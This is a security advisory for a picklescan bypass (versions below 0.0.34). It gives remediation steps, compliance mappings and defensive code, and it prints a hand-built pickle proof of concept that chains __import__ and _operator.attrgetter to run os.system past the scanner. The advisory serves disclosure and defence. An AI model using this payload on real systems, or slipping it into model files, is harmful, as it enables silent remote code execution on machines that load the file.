GHSA-46h3-79wf-xr6c (HIGH)
Published December 30, 2025
CISO Take

If your ML pipeline uses picklescan to gate model loading, upgrade to 0.0.34 immediately — prior versions have a confirmed bypass allowing malicious pickle files to pass as clean, leading to RCE on model load. This is a false-negative in a security control, which is worse than no control: it creates false confidence while providing zero protection. Treat any externally sourced model scanned with picklescan < 0.0.34 as potentially compromised.
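A simple way to enforce this in CI is to fail closed whenever the installed picklescan predates the patched release. The sketch below uses only the standard library; the three-part version comparison is deliberately simplified (it does not handle PEP 440 pre/post releases) and is for illustration only.

```python
# Sketch: fail closed if the installed picklescan predates the patched
# release (0.0.34). The version parser is simplified, not a PEP 440 parser.
from importlib.metadata import PackageNotFoundError, version

PATCHED = (0, 0, 34)

def parse(v: str) -> tuple:
    """Turn a version string like '0.0.33' into (0, 0, 33) for comparison."""
    return tuple(int(part) for part in v.split(".")[:3])

def picklescan_is_patched() -> bool:
    try:
        return parse(version("picklescan")) >= PATCHED
    except PackageNotFoundError:
        # Not installed at all: treat any scan result as untrustworthy.
        return False
```

A gate like this belongs before any scan step, so a stale scanner stops the pipeline instead of silently blessing malicious models.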

Affected Systems

Package      Ecosystem   Vulnerable Range   Patched
picklescan   pip         < 0.0.34           0.0.34

Do you use picklescan below 0.0.34? You're affected.

Severity & Risk

CVSS 3.1: N/A
EPSS: N/A
KEV Status: Not in KEV
Sophistication: Moderate

Recommended Action

  1. PATCH: Upgrade picklescan to >= 0.0.34 immediately — this is the only direct fix.
  2. AUDIT: Review models validated with older picklescan versions, especially those sourced from external repositories; re-scan them with the patched version.
  3. DEFENSE-IN-DEPTH: Never rely solely on picklescan — add sandboxed model loading (isolated containers with no network egress), enforce model provenance verification (cryptographic hashes, signing via Sigstore/DVC), and restrict what model-loading processes can spawn.
  4. DETECT: Monitor for unexpected process spawns, shell executions, or network connections initiated during model load operations.
  5. POLICY: Enforce an allowlist of trusted model sources; require signed artifacts from external registries before any model enters your pipeline.
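The provenance-verification step can be as small as pinning a SHA-256 digest per approved artifact and refusing to load anything else. A minimal stdlib sketch, where the `APPROVED_DIGESTS` allowlist is a hypothetical, org-maintained mapping:

```python
# Sketch: refuse model artifacts whose SHA-256 digest is not on an allowlist.
# APPROVED_DIGESTS is a hypothetical mapping your org would maintain and sign.
import hashlib
from pathlib import Path

APPROVED_DIGESTS = {
    # "model.bin": "<expected sha256 hex digest>",
}

def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()

def verify_artifact(path: Path) -> bool:
    expected = APPROVED_DIGESTS.get(path.name)
    return expected is not None and sha256_of(path) == expected
```

Digest pinning is independent of any scanner, so a scanner bypass like this one cannot defeat it; it does, however, require a trusted channel for distributing the allowlist itself (e.g. a signed file).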

Classification

Compliance Impact

This advisory is relevant to:

EU AI Act
- Article 9 - Risk management system
- Article 15 - Accuracy, robustness and cybersecurity
- Article 17 - Quality management system
ISO 42001
- A.5.2 - AI risk assessment
- A.6.1 - AI system design
- A.6.2 - AI risk assessment
- A.8.5 - AI system security
NIST AI RMF
- GOVERN 1.7 - AI supply chain risk management
- GOVERN 6.2 - Policies for third-party AI and supply chain risk
- MEASURE 2.5 - AI risk measurement for acquired components
- MEASURE 2.6 - AI risk — security and resilience
OWASP LLM Top 10
- LLM05:2025 - Supply Chain Vulnerabilities

Technical Details

NVD Description

Summary

The attack payload uses _operator.attrgetter, a built-in Python function, to execute code from a pickle file while evading picklescan's detection.

Details

The attack executes in the following steps:

- First, the attacker crafts the payload by calling the _operator.attrgetter function in the __reduce__ method.
- Then, the victim checks the pickle file with the picklescan library, which detects no dangerous functions. When the victim calls pickle.load() on the malicious pickle file, it leads to remote code execution.

PoC

```
import pickle
import pickletools

opcode3 = b'''cbuiltins
__import__
(Vos
tRp0
0c_operator
attrgetter
(Vsystem
tR(g0
tR(Vecho "pwned by _operator.attrgetter"
tR.'''

pickletools.dis(opcode3)
pickle.loads(opcode3)
```

This PoC can't easily be created with pickle.dumps, so it was built by hand.

Impact

Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models is affected. Attackers can embed malicious code in a pickle file that remains undetected but executes when the file is loaded, and can distribute infected pickle files across ML models, APIs, or saved Python objects.

Credit

Reported by Pinji Chen (cpj24@mails.tsinghua.edu.cn) from the NISL lab (https://netsec.ccert.edu.cn/about) at Tsinghua University, and Guanheng Liu (coolwind326@gmail.com).
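To see why a payload like this is dangerous without ever executing it, pickletools.genops can enumerate the globals a pickle stream resolves; disassembly never runs REDUCE. The sketch below reuses the PoC opcode stream and lists GLOBAL names statically. One caveat, stated in the code: protocol 2+ pickles use STACK_GLOBAL, whose module/name operands come from the stack, so a purely static pass cannot always recover them.

```python
# Sketch: statically list every GLOBAL a pickle stream resolves, without
# executing it. pickletools.genops only disassembles; it never runs REDUCE,
# so this is safe to run on untrusted bytes.
import pickletools

# The PoC opcode stream from the advisory (protocol 0, hand-built).
PAYLOAD = b'''cbuiltins
__import__
(Vos
tRp0
0c_operator
attrgetter
(Vsystem
tR(g0
tR(Vecho "pwned by _operator.attrgetter"
tR.'''

def listed_globals(data: bytes) -> list:
    names = []
    for opcode, arg, pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            # Protocol 0/1: module and name are inline, e.g. "builtins __import__"
            names.append(arg)
        elif opcode.name == "STACK_GLOBAL":
            # Protocol 2+: operands come from the stack; not statically visible.
            names.append("<stack global>")
    return names
```

Running this over the PoC surfaces both builtins.__import__ and _operator.attrgetter, the gadget pair that picklescan < 0.0.34 failed to flag.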

Exploitation Scenario

An attacker publishes a trojanized PyTorch model on HuggingFace under a convincing name (typosquatting a popular model). The model checkpoint contains a malicious pickle payload using _operator.attrgetter to chain __import__('os').system() calls — opcodes deliberately crafted to avoid picklescan's blocklist. An ML engineer downloads the model and runs picklescan as part of their standard security workflow; the tool reports zero detections. Trusting the scan result, the engineer loads the model with torch.load(), triggering the payload on the GPU training server — establishing a reverse shell or exfiltrating credentials from the ML environment. The entire attack is silent, bypasses the organization's assumed security control, and can propagate further if the compromised server has access to shared model storage or internal APIs.
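A structural mitigation for this scenario is to deny the unpickler any global resolution at all, which is the idea behind torch.load(..., weights_only=True) in modern PyTorch. A minimal stdlib sketch of the same principle (the class and function names here are ours, not a library API):

```python
# Sketch: an Unpickler that refuses to resolve ANY global, so gadget chains
# built on callables such as _operator.attrgetter cannot even be constructed.
# Plain data (lists, dicts, strings, numbers) still round-trips normally.
import io
import pickle

class NoGlobalsUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        raise pickle.UnpicklingError(
            f"blocked global during unpickling: {module}.{name}")

def restricted_loads(data: bytes):
    return NoGlobalsUnpickler(io.BytesIO(data)).load()
```

Unlike a blocklist scanner, this denies by default: a bypass would require a flaw in the unpickler itself, not merely a callable the scanner forgot about. The trade-off is that legitimate pickles containing classes or functions will also be rejected, so it fits weights-only artifacts best.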

Timeline

Published
December 30, 2025
Last Modified
December 30, 2025
First Seen
March 24, 2026